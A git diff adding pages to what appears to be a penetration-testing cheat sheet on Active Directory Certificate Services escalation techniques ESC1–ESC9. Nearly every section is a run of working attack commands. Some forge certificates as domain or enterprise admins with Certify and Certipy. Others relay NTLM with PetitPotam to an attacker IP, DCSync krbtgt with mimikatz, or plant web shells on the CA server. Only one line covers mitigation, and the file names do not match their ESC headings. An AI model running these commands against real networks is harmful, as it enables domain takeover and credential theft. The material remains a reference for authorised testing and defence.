AD CS ESC Attacks

Author: swisskyrepo

docs/active-directory/ad-adcs-esc.md

@@ -0,0 +1,53 @@
+# Active Directory - Certificate ESC1
+
+## ESC1 - Misconfigured Certificate Templates
+
+> Domain Users can enroll in the **VulnTemplate** template, which can be used for client authentication and has **ENROLLEE_SUPPLIES_SUBJECT** set. This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA). Allows additional identities to be bound to a certificate beyond the Subject.
+
+**Requirements**
+
+* Template that allows for AD authentication
+* **ENROLLEE_SUPPLIES_SUBJECT** flag
+* [PKINIT] Client Authentication, Smart Card Logon, Any Purpose, or No EKU (Extended/Enhanced Key Usage)
+
+**Exploitation**
+
+* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates
+
+    ```ps1
+    Certify.exe find /vulnerable
+    Certify.exe find /vulnerable /currentuser
+    # or
+    PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
+    # or
+    certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
+    # or
+    python bloodyAD.py -u john.doe -p 'Password123!' --host 192.168.100.1 -d bloody.lab get search --base 'CN=Configuration,DC=lab,DC=local' --filter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))'
+    ```
+
+* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
+
+    ```ps1
+    # request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
+    Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
+    certi.py req 'contoso.local/[email protected]' contoso-DC01-CA -k -n --alt-name han --template UserSAN
+    certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]'
+    ```
+
+* Use OpenSSL and convert the certificate, do not enter a password
+
+    ```ps1
+    openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
+    ```
+
+* Move the cert.pfx to the target machine filesystem and request a TGT for the altname user using Rubeus
+
+    ```ps1
+    Rubeus.exe asktgt /user:domadmin /certificate:C:\Temp\cert.pfx
+    ```
+
+**WARNING**: These certificates will still be usable even if the user or computer resets their password!
+
+**NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints.
+
+## References

docs/active-directory/ad-adcs-esc01.md

@@ -0,0 +1,21 @@
+# Active Directory - Certificate ESC2
+
+## ESC2 - Misconfigured Certificate Templates
+
+**Requirements**
+
+* Allows requesters to specify a Subject Alternative Name (SAN) in the CSR as well as allows Any Purpose EKU (2.5.29.37.0)
+
+**Exploitation**
+
+* Find template
+
+  ```ps1
+  PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
+  # or
+  python bloodyAD.py -u john.doe -p 'Password123!' --host 192.168.100.1 -d bloody.lab get search --base 'CN=Configuration,DC=megacorp,DC=local' --filter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))'
+  ```
+
+* Request a certificate specifying the `/altname` as a domain admin like in [ESC1 - Misconfigured Certificate Templates](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-esc01/).
+
+## References

docs/active-directory/ad-adcs-esc02.md

@@ -0,0 +1,20 @@
+# Active Directory - Certificate ESC3
+
+## ESC3 - Misconfigured Enrollment Agent Templates
+
+> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users
+
+* Request a certificate based on the vulnerable certificate template ESC3.
+
+  ```ps1
+  $ certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC3'
+  [*] Saved certificate and private key to 'john.pfx'
+  ```
+
+* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user
+
+  ```ps1
+  certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
+  ```
+
+## References

docs/active-directory/ad-adcs-esc03.md

@@ -0,0 +1,41 @@
+# Active Directory - Certificate ESC4
+
+## ESC4 - Access Control Vulnerabilities
+
+> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
+
+* Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate)
+
+  ```ps1
+  python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl
+  ```
+
+* Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1
+
+  ```ps1
+  python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag
+
+  # Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. 
+  C:\>StandIn.exe --adcs --filter WebServer --ess --add
+  ```
+
+* Perform ESC1 and then restore the value
+
+  ```ps1
+  python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
+  ```
+
+Using Certipy
+
+```ps1
+# overwrite the configuration to make it vulnerable to ESC1
+certipy template 'corp.local/[email protected]' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old
+# request a certificate based on the ESC4 template, just like ESC1.
+certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC4' -alt '[email protected]'
+# restore the old configuration
+certipy template 'corp.local/[email protected]' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json
+```
+
+## References
+
+* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)

docs/active-directory/ad-adcs-esc04.md

@@ -0,0 +1,28 @@
+# Active Directory - Certificate ESC5
+
+## ESC5 - Vulnerable PKI Object Access Control
+
+> Escalate the privileges from **Domain Administrator** in the child domain into **Enterprise Administrator** at the forest root.
+
+**Requirements**:
+
+* Add new templates to the "Certificate" Templates container
+* "WRITE" access to the `pKIEnrollmentService` object
+
+**Exploitation**:
+
+* Use `PsExec` to launch `mmc` as SYSTEM on the child DC: `psexec.exe /accepteula -i -s mmc`
+* Connect to "Configuration naming context" > "Certificate Template" container
+* Open `certsrv.msc` as SYSTEM and duplicate an existing template
+* Edit the properties of the template to:
+    * Granting enroll rights to a principal we control in the child domain.
+    * Including Client Authentication in the Application Policies.
+    * Allowing SANs in certificate requests.
+    * Not enabling manager approval or authorized signatures.
+* Publish the certificate template to the CA
+    * Publish by adding the template to the list in `certificateTemplate` property of `CN=Services`>`CN=Public Key Services`>`CN=Enrollment Services`>`pkiEnrollmentService`
+* Finally use the ESC1 vulnerability introduced in the duplicated template to issue a certificate impersonating an Enterprise Administrator.
+
+## References
+
+* [From DA to EA with ESC5 - Andy Robbins - May 16, 2023](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c)

docs/active-directory/ad-adcs-esc05.md

@@ -0,0 +1,27 @@
+# Active Directory - Certificate ESC6
+
+## ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
+
+> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
+
+**Exploitation**
+
+* Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag.
+
+    ```ps1
+    Certify.exe cas
+    ```
+
+* Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names
+
+    ```ps1
+    .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin
+    ```
+
+**Mitigation**
+
+* Remove the flag: `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2`
+
+## References
+
+* [AD CS: from ManageCA to RCE - February 11, 2022 - Pablo Martínez, Kurosh Dabbagh](https://web.archive.org/web/20220212053945/http://www.blackarrow.net/ad-cs-from-manageca-to-rce//)

docs/active-directory/ad-adcs-esc06.md

@@ -0,0 +1,52 @@
+# Active Directory - Certificate ESC7
+
+## ESC7 - Vulnerable Certificate Authority Access Control
+
+**Exploitation**
+
+* Detect CAs that allow low privileged users the `ManageCA`  or `Manage Certificates` permissions
+
+    ```ps1
+    Certify.exe find /vulnerable
+    ```
+
+* Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6)
+
+    ```ps1
+    Certify.exe setconfig /enablesan /restart
+    ```
+
+* Request the certificate with the desired SAN.
+
+    ```ps1
+    Certify.exe request /template:User /altname:super.adm
+    ```
+
+* Grant approval if required or disable the approval requirement
+
+    ```ps1
+    # Grant
+    Certify.exe issue /id:[REQUEST ID]
+    # Disable
+    Certify.exe setconfig /removeapproval /restart
+    ```
+
+Alternative exploitation from **ManageCA** to **RCE** on ADCS server:
+
+```ps1
+# Get the current CDP list. Useful to find remote writable shares:
+Certify.exe writefile /ca:SERVER\ca-name /readonly
+
+# Write an aspx shell to a local web directory:
+Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx
+
+# Write the default asp shell to a local web directory:
+Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
+
+# Write a php shell to a remote web directory:
+Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
+```
+
+## References
+
+* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)

docs/active-directory/ad-adcs-esc07.md

@@ -0,0 +1,90 @@
+# Active Directory - Certificate ESC8
+
+## ESC8 - Web Enrollment Relay
+
+> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
+
+Require [SecureAuthCorp/impacket](https://github.com/SecureAuthCorp/impacket/pull/1101) PR #1101
+
+* **Version 1**: NTLM Relay + Rubeus + PetitPotam
+
+  ```powershell
+  impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
+  impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
+  # For a member server or workstation, the template would be "Computer".
+  # Other templates: workstation, DomainController, Machine, KerberosAuthentication
+
+  # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam 
+  # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
+  git clone https://github.com/topotam/PetitPotam
+  python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
+  python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
+  python3 dementor.py <listener> <target> -u <username> -p <password> -d <domain>
+  python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local
+
+  # Use the certificate with rubeus to request a TGT
+  Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
+  Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt
+
+  # Now you can use the TGT to perform a DCSync
+  mimikatz> lsadump::dcsync /user:krbtgt
+  ```
+
+* **Version 2**: NTLM Relay + Mimikatz + Kekeo
+
+  ```powershell
+  impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+
+  # Mimikatz
+  mimikatz> misc::efs /server:dc.lab.local /connect:<IP> /noauth
+
+  # Kekeo
+  kekeo> base64 /input:on
+  kekeo> tgt::ask /pfx:<BASE64-CERT-FROM-NTLMRELAY> /user:dc$ /domain:lab.local /ptt
+
+  # Mimikatz
+  mimikatz> lsadump::dcsync /user:krbtgt
+  ```
+
+* **Version 3**: Kerberos Relay
+
+  ```ps1
+  # Setup the relay
+  sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
+
+  # Run mitm6
+  sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v
+  ```
+
+* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
+
+  ```powershell
+  https://github.com/bats3c/ADCSPwn
+  adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
+  adcspwn.exe --adcs cs.pwnlab.local
+  adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
+  adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
+  adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
+
+  # ADCSPwn arguments
+  adcs            -       This is the address of the AD CS server which authentication will be relayed to.
+  secure          -       Use HTTPS with the certificate service.
+  port            -       The port ADCSPwn will listen on.
+  remote          -       Remote machine to trigger authentication from.
+  username        -       Username for non-domain context.
+  password        -       Password for non-domain context.
+  dc              -       Domain controller to query for Certificate Templates (LDAP).
+  unc             -       Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
+  output          -       Output path to store base64 generated crt.
+  ```
+
+* **Version 5**: Certipy ESC8
+
+  ```ps1
+  certipy relay -ca 172.16.19.100
+  ```
+
+## References
+
+* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/)
+* [AD CS relay attack - practical guide - @exandroiddev - June 23, 2021](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/)

docs/active-directory/ad-adcs-esc08.md

@@ -0,0 +1,50 @@
+# Active Directory - Certificate ESC9
+
+## ESC9 - No Security Extension
+
+**Requirements**
+
+* `StrongCertificateBindingEnforcement` set to `1` (default) or `0`
+* Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value
+* Certificate specifies `Any Client` authentication EKU
+* `GenericWrite` over any account A to compromise any account B
+
+**Scenario**
+
+<[email protected]> has **GenericWrite** over <[email protected]>, and we want to compromise <[email protected]>.
+<[email protected]> is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value.
+
+* Obtain the hash of Jane with Shadow Credentials (using our GenericWrite)
+
+    ```ps1
+    certipy shadow auto -username [email protected] -p Passw0rd -account Jane
+    ```
+
+* Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part
+
+    ```ps1
+    certipy account update -username [email protected] -password Passw0rd -user Jane -upn Administrator
+    ```
+
+* Request the vulnerable certificate template ESC9 from Jane's account.
+
+    ```ps1
+    certipy req -username [email protected] -hashes ... -ca corp-DC-CA -template ESC9
+    # userPrincipalName in the certificate is Administrator 
+    # the issued certificate contains no "object SID"
+    ```
+
+* Restore userPrincipalName of Jane to <[email protected]>.
+
+    ```ps1
+    certipy account update -username [email protected] -password Passw0rd -user [email protected]
+    ```
+
+* Authenticate with the certificate and receive the NT hash of the <[email protected]> user.
+
+    ```ps1
+    certipy auth -pfx administrator.pfx -domain corp.local
+    # Add -domain <domain> to your command line since there is no domain specified in the certificate.
+    ```
+
+## References